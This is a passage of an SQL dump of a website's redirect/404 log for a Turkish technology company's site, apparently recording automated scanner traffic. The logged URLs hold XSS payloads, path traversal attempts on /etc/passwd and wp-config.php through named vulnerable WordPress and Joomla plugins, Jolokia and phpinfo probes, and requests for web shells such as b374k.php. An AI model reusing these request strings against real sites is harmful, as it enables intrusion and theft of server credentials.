00:00:00',301),(29073,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/?alg_wc_ev_verify_email=eyjpzci6mswiy29kzsi6mh0=',NULL,'','',2,0,'2022-04-23 15:46:54','0000-00-00 00:00:00',301),(29074,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/runningpods/',NULL,'','',1,0,'2022-04-23 17:24:18','0000-00-00 00:00:00',301),(29075,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/osm/register.cmd',NULL,'','',2,0,'2022-04-23 17:24:29','0000-00-00 00:00:00',301),(29076,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/osm_tiles/register.cmd',NULL,'','',1,0,'2022-04-23 17:24:36','0000-00-00 00:00:00',301),(29077,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/metrics',NULL,'','',1,0,'2022-04-23 17:25:25','0000-00-00 00:00:00',301),(29078,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php',NULL,'','',1,0,'2022-04-23 17:31:24','0000-00-00 00:00:00',301),(29079,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/administrator/components/com_joomla-visites/core/include/mymailer.class.php?mosconfig_absolute_path=../../../../../../../../../../../../etc/passwd',NULL,'','',1,0,'2022-04-23 17:31:30','0000-00-00 00:00:00',301),(29080,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/druid/index.html',NULL,'','',1,0,'2022-04-23 17:31:34','0000-00-00 00:00:00',301),(29081,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/go/add-on/business-continuity/api/cruise_config',NULL,'','',1,0,'2022-04-23 17:31:49','0000-00-00 00:00:00',301),(29082,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/standard/default.php',NULL,'','',1,0,'2022-04-23 17:32:16','0000-00-00 00:00:00',301),(29083,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd\0',NULL,'','',1,0,'2022-04-23 17:32:29','0000-00-00 00:00:00',301),(29084,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/api/v1/namespaces/default/services',NULL,'','',1,0,'2022-04-23 17:34:24','0000-00-00 00:00:00',301),(29085,'https://3s-technologies.com.tr/tr/login',NULL,'','',43,0,'2022-04-23 17:39:06','0000-00-00 00:00:00',301),(29086,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/netbiblio/search/shortview?searchfield=w&searchtype=simple&searchterm=x\'+alert(1)+\'x',NULL,'','',1,0,'2022-04-23 17:39:20','0000-00-00 00:00:00',301),(29087,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/netbiblio/search/shortview?searchfield=w&searchtype=simple&searchterm=x\\\'+alert(1),//',NULL,'','',1,0,'2022-04-23 17:39:23','0000-00-00 00:00:00',301),(29088,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/webapi/v1/system/accountmanage/account',NULL,'','',1,0,'2022-04-23 17:39:26','0000-00-00 00:00:00',301),(29089,'https://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'','',2,0,'2022-04-23 17:49:56','0000-00-00 00:00:00',301),(29090,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/actuator/jolokia/read/jmimplementation:type=mbeanserverdelegate/implementationname',NULL,'','',1,0,'2022-04-23 17:53:43','0000-00-00 00:00:00',301),(29091,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/actuator/jolokia/read/jmimplementation:type=mbeanserverdelegate/implementationvendor',NULL,'','',1,0,'2022-04-23 17:53:52','0000-00-00 00:00:00',301),(29092,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/actuator/jolokia/read/jmimplementation:type=mbeanserverdelegate/implementationversion',NULL,'','',1,0,'2022-04-23 17:53:57','0000-00-00 00:00:00',301),(29093,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/actuator/jolokia/read/jmimplementation:type=mbeanserverdelegate/mbeanserverid',NULL,'','',1,0,'2022-04-23 17:54:09','0000-00-00 00:00:00',301),(29094,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/actuator/jolokia/read/jmimplementation:type=mbeanserverdelegate/specificationname',NULL,'','',1,0,'2022-04-23 17:54:18','0000-00-00 00:00:00',301),(29095,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/actuator/jolokia/read/jmimplementation:type=mbeanserverdelegate/specificationvendor',NULL,'','',2,0,'2022-04-23 17:54:30','0000-00-00 00:00:00',301),(29096,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/actuator/jolokia/read/jmimplementation:type=mbeanserverdelegate/specificationversion',NULL,'','',1,0,'2022-04-23 17:54:46','0000-00-00 00:00:00',301),(29097,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/actuator/jolokia/read/java.lang:type=memory',NULL,'','',1,0,'2022-04-23 17:54:57','0000-00-00 00:00:00',301),(29098,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/jolokia/read/java.lang:type=memory',NULL,'','',1,0,'2022-04-23 17:54:59','0000-00-00 00:00:00',301),(29099,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/jolokia/read/jmimplementation:type=mbeanserverdelegate/implementationname',NULL,'','',1,0,'2022-04-23 17:55:10','0000-00-00 00:00:00',301),(29100,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/jolokia/read/jmimplementation:type=mbeanserverdelegate/implementationvendor',NULL,'','',1,0,'2022-04-23 17:55:12','0000-00-00 00:00:00',301),(29101,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/jolokia/read/jmimplementation:type=mbeanserverdelegate/implementationversion',NULL,'','',1,0,'2022-04-23 17:55:13','0000-00-00 00:00:00',301),(29102,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/jolokia/read/jmimplementation:type=mbeanserverdelegate/mbeanserverid',NULL,'','',1,0,'2022-04-23 17:55:18','0000-00-00 00:00:00',301),(29103,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/jolokia/read/jmimplementation:type=mbeanserverdelegate/specificationname',NULL,'','',1,0,'2022-04-23 17:55:31','0000-00-00 00:00:00',301),(29104,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/jolokia/read/jmimplementation:type=mbeanserverdelegate/specificationvendor',NULL,'','',1,0,'2022-04-23 17:55:39','0000-00-00 00:00:00',301),(29105,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/jolokia/read/jmimplementation:type=mbeanserverdelegate/specificationversion',NULL,'','',1,0,'2022-04-23 17:55:41','0000-00-00 00:00:00',301),(29106,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd\0',NULL,'','',1,0,'2022-04-23 18:24:24','0000-00-00 00:00:00',301),(29107,'https://3s-technologies.com.tr/tr/login/',NULL,'','',3,0,'2022-04-23 18:25:25','0000-00-00 00:00:00',301),(29108,'https://3s-technologies.com.tr/tr/variable/varimport',NULL,'https://3s-technologies.com.tr/admin/variable/','',1,0,'2022-04-23 18:25:30','0000-00-00 00:00:00',301),(29109,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/.mailmap',NULL,'','',1,0,'2022-04-23 18:53:13','0000-00-00 00:00:00',301),(29110,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/wp-content/themes/haberadam/api/mobile-info.php?id=',NULL,'','',1,0,'2022-04-23 18:55:36','0000-00-00 00:00:00',301),(29111,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/blog/wp-content/themes/haberadam/api/mobile-info.php?id=',NULL,'','',1,0,'2022-04-23 18:55:38','0000-00-00 00:00:00',301),(29112,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/wp-content/plugins/wordpress/aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-04-23 18:55:43','0000-00-00 00:00:00',301),(29113,'https://3s-technologies.com.tr/tr/service/rapture/session',NULL,'','',1,0,'2022-04-23 18:56:13','0000-00-00 00:00:00',301),(29114,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/rest/api/2/screens',NULL,'','',1,0,'2022-04-23 18:57:06','0000-00-00 00:00:00',301),(29115,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/api/edr/sangforinter/v2/cssp/slog_client?token=eyjtzduionrydwv9',NULL,'','',1,0,'2022-04-23 18:57:39','0000-00-00 00:00:00',301),(29116,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/irj/go/km/navigation/',NULL,'','',1,0,'2022-04-23 18:57:57','0000-00-00 00:00:00',301),(29117,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/log/development.log',NULL,'','',1,0,'2022-04-23 18:58:56','0000-00-00 00:00:00',301),(29118,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/logs/development.log',NULL,'','',1,0,'2022-04-23 18:59:01','0000-00-00 00:00:00',301),(29119,'https://3s-technologies.com.tr/tr/client/index.php',NULL,'','',1,0,'2022-04-23 19:00:39','0000-00-00 00:00:00',301),(29120,'https://3s-technologies.com.tr/tr/portal/info.jsp',NULL,'','',1,0,'2022-04-23 19:01:53','0000-00-00 00:00:00',301),(29121,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/public/sample-config.js',NULL,'','',1,0,'2022-04-23 19:03:42','0000-00-00 00:00:00',301),(29122,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/public/config.js',NULL,'','',1,0,'2022-04-23 19:03:56','0000-00-00 00:00:00',301),(29123,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/config.js',NULL,'','',1,0,'2022-04-23 19:04:05','0000-00-00 00:00:00',301),(29124,'https://3s-technologies.com.tr/tr/rpc2_login',NULL,'https://3s-technologies.com.tr/tr/?format=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&type=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E','',1,0,'2022-04-23 19:04:09','0000-00-00 00:00:00',301),(29125,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/index.php?option=com_gcalendar&controller=../../../../../etc/passwd\0',NULL,'','',1,0,'2022-04-23 19:07:27','0000-00-00 00:00:00',301),(29126,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/?id=nuclei%{128*128}',NULL,'','',1,0,'2022-04-23 19:07:52','0000-00-00 00:00:00',301),(29127,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/admin/',NULL,'','',1,0,'2022-04-23 19:08:07','0000-00-00 00:00:00',301),(29128,'https://3s-technologies.com.tr/tr/wp-admin/admin-ajax.php',NULL,'','',1,0,'2022-04-23 19:09:56','0000-00-00 00:00:00',301),(29129,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/xml/user/user.xml',NULL,'','',1,0,'2022-04-23 19:10:00','0000-00-00 00:00:00',301),(29130,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/telescope/requests',NULL,'','',1,0,'2022-04-23 19:24:44','0000-00-00 00:00:00',301),(29131,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/website/lang/en_us?r=https://example.com/',NULL,'','',1,0,'2022-04-23 19:54:00','0000-00-00 00:00:00',301),(29132,'https://3s-technologies.com.tr/tr/dev/license.txt',NULL,'https://3s-technologies.com.tr/dev/license.txt','',1,0,'2022-04-23 20:29:30','0000-00-00 00:00:00',301),(29133,'http://3s-technologies.com.tr/en/contacts/|',NULL,'http://3s-technologies.com.tr/','',1,0,'2022-04-24 10:02:14','0000-00-00 00:00:00',301),(29134,'http://3s-technologies.com.tr/tr/assets/elfinder/connectors/php/connector.php',NULL,'','',4,0,'2022-04-25 13:44:18','0000-00-00 00:00:00',301),(29135,'http://3s-technologies.com.tr/tr/wp-includes/js/zxcvbn-async.min.js',NULL,'','',1,0,'2022-04-25 14:40:48','0000-00-00 00:00:00',301),(29136,'http://3s-technologies.com.tr/tr/a/license.txt',NULL,'http://3s-technologies.com.tr/a/license.txt','',1,0,'2022-04-25 18:58:51','0000-00-00 00:00:00',301),(29137,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar',NULL,'','',1,0,'2022-04-26 20:20:16','0000-00-00 00:00:00',301),(29138,'https://3s-technologies.com.tr/index.php/en/products/manufacturers/aqueous?tmpl=component',NULL,'','',1,0,'2022-04-27 05:57:04','0000-00-00 00:00:00',301),(29139,'https://3s-technologies.com.tr/tr/a/license.txt',NULL,'https://3s-technologies.com.tr/a/license.txt','',2,0,'2022-04-27 16:00:24','0000-00-00 00:00:00',301),(29140,'https://3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,mf_name',NULL,'','',1,0,'2022-04-27 17:46:18','0000-00-00 00:00:00',301),(29141,'http://3s-technologies.com.tr/tr/admin/elfinder/php/connector.php',NULL,'','',3,0,'2022-04-29 14:27:05','0000-00-00 00:00:00',301),(29142,'https://3s-technologies.com.tr/tr/.ds_store',NULL,'https://3s-technologies.com.tr/.DS_Store','',5,0,'2022-04-30 09:33:27','0000-00-00 00:00:00',301),(29143,'http://3s-technologies.com.tr/tr/assets/js/elfinder/php/connector.php',NULL,'','',3,0,'2022-05-01 01:16:19','0000-00-00 00:00:00',301),(29144,'http://3s-technologies.com.tr/tr/ãƒâ¼rãƒâ¼nler/odd-shape-inserter/npm-vf-detail',NULL,'','',8,0,'2022-05-01 23:49:06','0000-00-00 00:00:00',301),(29145,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±/le-40v-detail',NULL,'','',2,0,'2022-05-02 07:23:07','0000-00-00 00:00:00',301),(29146,'http://www.3s-technologies.com.tr/tr/sitemap',NULL,'','',88,0,'2022-05-02 07:40:47','0000-00-00 00:00:00',301),(29147,'https://3s-technologies.com.tr/tr/sitemap',NULL,'','',151,0,'2022-05-02 07:40:57','0000-00-00 00:00:00',301),(29148,'http://3s-technologies.com.tr/tr/admin/assets/plugins/elfinder/php/connector.php',NULL,'','',3,0,'2022-05-02 13:22:27','0000-00-00 00:00:00',301),(29149,'http://3s-technologies.com.tr/en/wp-content/mu-plugins-old/index.php?f=/nmrtjoujadutreqj/scrjkuhlebpzmtyo.txt',NULL,'www.bing.com','',3,0,'2022-05-03 05:57:12','0000-00-00 00:00:00',301),(29150,'http://3s-technologies.com.tr/en/wp-admin.php?daksldlkdsadas=1',NULL,'www.bing.com','',2,0,'2022-05-03 05:57:18','0000-00-00 00:00:00',301),(29151,'http://3s-technologies.com.tr/en/qindex.php?daksldlkdsadas=1',NULL,'www.bing.com','',3,0,'2022-05-03 05:57:19','0000-00-00 00:00:00',301),(29152,'http://3s-technologies.com.tr/en/css.php',NULL,'www.bing.com','',34,0,'2022-05-03 05:57:34','0000-00-00 00:00:00',301),(29153,'http://3s-technologies.com.tr/en/xindex.php',NULL,'www.bing.com','',18,0,'2022-05-03 05:57:55','0000-00-00 00:00:00',301),(29154,'https://mail.3s-technologies.com.tr/tr/.ds_store',NULL,'https://mail.3s-technologies.com.tr/.DS_Store','',4,0,'2022-05-03 12:26:40','0000-00-00 00:00:00',301),(29155,'http://3s-technologies.com.tr/tr/plugins/elfinder/php/connector.php',NULL,'','',3,0,'2022-05-04 09:48:10','0000-00-00 00:00:00',301),(29156,'https://3s-technologies.com.tr/en/using-joomla/extensions/components/users-component/index.php/en/using-joomla/extensions/components/users-component/',NULL,'https://3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/users-component/','',9,0,'2022-05-05 23:35:05','0000-00-00 00:00:00',301),(29157,'http://3s-technologies.com.tr/tr/assets/elfinder/php/connector.minimal.php',NULL,'','',2,0,'2022-05-06 13:25:26','0000-00-00 00:00:00',301),(29158,'http://3s-technologies.com.tr/en/radio.txt',NULL,'','',7,0,'2022-05-06 19:26:24','0000-00-00 00:00:00',301),(29159,'http://3s-technologies.com.tr/tr/radio.txt',NULL,'','',1,0,'2022-05-06 19:38:33','0000-00-00 00:00:00',301),(29160,'https://www.3s-technologies.com.tr/tr/.ds_store',NULL,'https://www.3s-technologies.com.tr/.DS_Store','',7,0,'2022-05-06 20:29:28','0000-00-00 00:00:00',301),(29161,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/rl132-detail?tmpl=component&print=1',NULL,'','',1,0,'2022-05-07 20:57:03','0000-00-00 00:00:00',301),(29162,'http://3s-technologies.com.tr/tr/assets/plugins/elfinder/php/connector.minimal.php',NULL,'','',3,0,'2022-05-08 01:12:25','0000-00-00 00:00:00',301),(29163,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/avb-detail?tmpl=component&print=1',NULL,'','',1,0,'2022-05-09 01:32:33','0000-00-00 00:00:00',301),(29164,'http://www.3s-technologies.com.tr/tr/indexrefresherror',NULL,'http://www.3s-technologies.com.tr/tr/indexRefreshError','',1,0,'2022-05-09 04:18:34','0000-00-00 00:00:00',301),(29165,'http://3s-technologies.com.tr/tr/assets/elfinder/php/connector.php',NULL,'','',3,0,'2022-05-09 12:01:46','0000-00-00 00:00:00',301),(29166,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/manufacturer/resized/tolo_logo_150x150.jpg',NULL,'','',1,0,'2022-05-09 16:30:41','0000-00-00 00:00:00',301),(29167,'http://3s-technologies.com.tr/wp-plain.php',NULL,'www.google.com','',32,0,'2022-05-10 17:32:59','0000-00-00 00:00:00',301),(29168,'http://3s-technologies.com.tr/en/tsgoqkgg.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-10 17:33:05','0000-00-00 00:00:00',301),(29169,'https://3s-technologies.com.tr/wp-plain.php',NULL,'www.google.com','',29,0,'2022-05-10 17:33:13','0000-00-00 00:00:00',301),(29170,'https://3s-technologies.com.tr/en/tsgoqkgg.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-10 17:33:15','0000-00-00 00:00:00',301),(29171,'https://3s-technologies.com.tr/old_phpinfo.php',NULL,'','',1,0,'2022-05-10 21:36:45','0000-00-00 00:00:00',301),(29172,'http://3s-technologies.com.tr/old_phpinfo.php',NULL,'','',1,0,'2022-05-10 21:36:50','0000-00-00 00:00:00',301),(29173,'http://3s-technologies.com.tr/tr/plugins/elfinder/php/connector.minimal.php',NULL,'','',3,0,'2022-05-10 21:58:38','0000-00-00 00:00:00',301),(29174,'http://3s-technologies.com.tr/pinfo.php',NULL,'','',1,0,'2022-05-11 04:26:38','0000-00-00 00:00:00',301),(29175,'https://3s-technologies.com.tr/pinfo.php',NULL,'','',1,0,'2022-05-11 04:26:38','0000-00-00 00:00:00',301),(29176,'https://3s-technologies.com.tr/test.php',NULL,'','',1,0,'2022-05-11 09:21:25','0000-00-00 00:00:00',301),(29177,'http://3s-technologies.com.tr/linusadmin-phpinfo.php',NULL,'','',1,0,'2022-05-11 10:31:00','0000-00-00 00:00:00',301),(29178,'https://3s-technologies.com.tr/linusadmin-phpinfo.php',NULL,'','',1,0,'2022-05-11 10:31:00','0000-00-00 00:00:00',301),(29179,'http://3s-technologies.com.tr/admin_phpinfo.php',NULL,'','',1,0,'2022-05-11 13:43:54','0000-00-00 00:00:00',301),(29180,'https://3s-technologies.com.tr/admin_phpinfo.php',NULL,'','',1,0,'2022-05-11 13:43:54','0000-00-00 00:00:00',301),(29181,'https://3s-technologies.com.tr/i.php',NULL,'','',1,0,'2022-05-11 15:58:26','0000-00-00 00:00:00',301),(29182,'http://3s-technologies.com.tr/i.php',NULL,'','',1,0,'2022-05-11 15:58:26','0000-00-00 00:00:00',301),(29183,'http://3s-technologies.com.tr/nuked-clan/index.php?file=news.aws/credentialsop=phpinfo',NULL,'','',1,0,'2022-05-11 23:33:33','0000-00-00 00:00:00',301),(29184,'https://3s-technologies.com.tr/nuked-clan/index.php?file=news.aws/credentialsop=phpinfo',NULL,'','',1,0,'2022-05-11 23:33:34','0000-00-00 00:00:00',301),(29185,'http://3s-technologies.com.tr/en/indeex.php?xxnew2018_url1=0115new1024.txt&writerfilename=.tmb/cache/xxo.php',NULL,'http://localhost/','',1,0,'2022-05-12 03:36:09','0000-00-00 00:00:00',301),(29186,'http://3s-technologies.com.tr/tr/assets/plugins/elfinder/php/connector.php',NULL,'','',3,0,'2022-05-12 10:44:54','0000-00-00 00:00:00',301),(29187,'http://3s-technologies.com.tr/phpversion.php',NULL,'','',1,0,'2022-05-13 13:52:30','0000-00-00 00:00:00',301),(29188,'https://3s-technologies.com.tr/phpversion.php',NULL,'','',1,0,'2022-05-13 13:52:30','0000-00-00 00:00:00',301),(29189,'http://www.3s-technologies.com.tr/tr/wp-config.php',NULL,'','',4,0,'2022-05-13 17:01:04','0000-00-00 00:00:00',301),(29190,'http://www.3s-technologies.com.tr/tr/wp-config.txt',NULL,'','',1,0,'2022-05-13 17:01:05','0000-00-00 00:00:00',301),(29191,'http://www.3s-technologies.com.tr/tr/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes',NULL,'','',1,0,'2022-05-13 17:01:11','0000-00-00 00:00:00',301),(29192,'http://www.3s-technologies.com.tr/tr/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:11','0000-00-00 00:00:00',301),(29193,'http://www.3s-technologies.com.tr/tr/wp-content/force-download.php?file=../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:12','0000-00-00 00:00:00',301),(29194,'http://www.3s-technologies.com.tr/tr/force-download.php?file=wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:13','0000-00-00 00:00:00',301),(29195,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:14','0000-00-00 00:00:00',301),(29196,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:15','0000-00-00 00:00:00',301),(29197,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:16','0000-00-00 00:00:00',301),(29198,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:17','0000-00-00 00:00:00',301),(29199,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mypath=../../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:18','0000-00-00 00:00:00',301),(29200,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:19','0000-00-00 00:00:00',301),(29201,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:20','0000-00-00 00:00:00',301),(29202,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:21','0000-00-00 00:00:00',301),(29203,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:21','0000-00-00 00:00:00',301),(29204,'http://www.3s-technologies.com.tr/tr/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:22','0000-00-00 00:00:00',301),(29205,'http://www.3s-technologies.com.tr/tr/wp-content/themes/nativechurch/download/download.php?file=../../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:23','0000-00-00 00:00:00',301),(29206,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadattachment.php?path=../../../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:24','0000-00-00 00:00:00',301),(29207,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:25','0000-00-00 00:00:00',301),(29208,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:26','0000-00-00 00:00:00',301),(29209,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:27','0000-00-00 00:00:00',301),(29210,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download',NULL,'','',1,0,'2022-05-13 17:01:28','0000-00-00 00:00:00',301),(29211,'http://www.3s-technologies.com.tr/tr/wp-content/themes/fiestaresidences/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:29','0000-00-00 00:00:00',301),(29212,'http://www.3s-technologies.com.tr/tr/wp-content/themes/erinvale/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:30','0000-00-00 00:00:00',301),(29213,'http://www.3s-technologies.com.tr/tr/wp-content/themes/hsv/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:30','0000-00-00 00:00:00',301),(29214,'http://www.3s-technologies.com.tr/tr/wp-content/themes/optimus/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:31','0000-00-00 00:00:00',301),(29215,'http://www.3s-technologies.com.tr/tr/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:32','0000-00-00 00:00:00',301),(29216,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php',NULL,'','',1,0,'2022-05-13 17:01:33','0000-00-00 00:00:00',301),(29217,'http://3s-technologies.com.tr/tr/admin/assets/elfinder/php/connector.php',NULL,'','',3,0,'2022-05-13 21:24:33','0000-00-00 00:00:00',301),(29218,'http://3s-technologies.com.tr/tr/aspx.php',NULL,'','',1,0,'2022-05-16 05:39:02','0000-00-00 00:00:00',301),(29219,'http://3s-technologies.com.tr/tr/b374k.php',NULL,'','',4,0,'2022-05-16 05:39:03','0000-00-00 